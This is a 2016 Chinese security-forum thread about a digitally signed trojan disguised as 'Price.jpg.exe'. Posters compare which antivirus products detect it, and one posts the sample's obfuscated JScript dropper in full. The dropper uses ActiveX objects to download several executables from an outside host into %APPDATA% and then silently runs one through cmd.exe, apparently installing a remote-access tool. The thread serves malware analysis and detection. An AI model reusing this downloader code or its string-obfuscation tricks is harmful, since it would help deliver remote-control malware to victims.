Price.jpg.exe（有数签！）

我要打十個

BHHZDQL 发表于 2016-9-4 18:26
这程序居然有数字签名
如果不这样干
很容易放过了

对的

BHHZDQL

我要打十個 发表于 2016-9-4 18:31
对的

由于我无法控制自学习引擎的误报率，为了不造成普遍误报，这种带签名的木马还是交给文件名反病毒吧

心醉咖啡

毒霸miss

pal家族

卡巴主防将其杀害！稍后补充



这辈子第二次看到SW的第三种报毒名@驭龙
上次报个了not a virus PDM XXXXXX 很尴尬。。。

3801187

250662772

[mw_shl_code=css,true]var c = "www.flareonqe.com/0/io/hotlink/wt4rud0ing/";
var b = "www.flareonqe.com/0/io/hotlink/wt4rud0ing/";
var a = "www.flareonqe.com/0/io/hotlink/wt4rud0ing/";


(function (GlobalObject) {

    function CreateObject(ProgId) {
        return new GlobalObject.ActiveXObject(ProgId)
    }
    var WshShell = CreateObject("WScript"+(1, ".Shell"));
    var flag = true, f = "DB.Stream";
    var DownloadFileFromURL;

    DownloadFileFromURL = function (Url, FileDest) {

        if (!FileDest || !Url) return null;
        FileDest = WshShell.ExpandEnvironmentStrings(FileDest);
        var oXMLhttp = CreateObject("Msxml2.XMLhttp");

        oXMLhttp.onreadystatechange=function()
          {
          if (oXMLhttp.readyState==4 && oXMLhttp.status==200)
            {
                flag = false;  
                with(CreateObject("ADO" + f)) {
                    Mode = 3;
                    Type = 1;
                    Open();
                    Write(oXMLhttp.responseBody);
                    SaveToFile(FileDest, 2);
                    Close();
                    return FileDest;
                }
            }
          }

        oXMLhttp.open("G" + (3, 4, "ET"), Url, true);
        oXMLhttp.send(null);
        while (flag) {GlobalObject.WScript.Sleep(1000)};
    }


    var FileDest = "%APPDATA%\\";
    var objShell = CreateObject( (89, 5, "Shell") + (54545, 656, ".Application") );
    FileDest = WshShell.ExpandEnvironmentStrings(FileDest);
    DownloadFileFromURL((56665, "h46t87t3p8s9:/69693/".replace(/\d/g,""))+GlobalObject.a+"EVOLUTIONDOTA30G", "%APPDATA%\\EVOLUTIONDOTA30G.exe");
    DownloadFileFromURL((434, "h564556t87t36566p8s9:/99/".replace(/\d/g,""))+GlobalObject.b+"EVOLUTIONDOTA2J", "%APPDATA%\\EVOLUTIONDOTA2J");

    if (((new Date())>1)) DownloadFileFromURL((34, "h46t87t3p8s9:/99/".replace(/\d/g,""))+GlobalObject.c+"EVOLUTIONDOTA61H", "%APPDATA%\\EVOLUTIONDOTA61H"+(7,(89, ".c")+"md" ));
    WScript.Sleep(50000);
    objShell[("zSzrhzrerlrl"+(8, "rrErxerczzrurzrrrztrre") ).replace(/[rz]/g,"")]( ('cm'+(677, 45, 'd.exe') ),'/c"'+FileDest+'EVOLUTIONDOTA61H'+(7,(89, ".c")+"md" )+'"','','',0);

})(this)[/mw_shl_code]

vm001

如果最后远程这步也能拦截就好了

追梦空间

drweb miss

我要打十個

vm001 发表于 2016-9-4 20:39
如果最后远程这步也能拦截就好了

大神我想请教下，怎么看远控的

vm001

我要打十個 发表于 2016-9-4 20:55
大神我想请教下，怎么看远控的

我也不知道。。。。。
不过这个样本那个释放的东东应该是个远程控制工具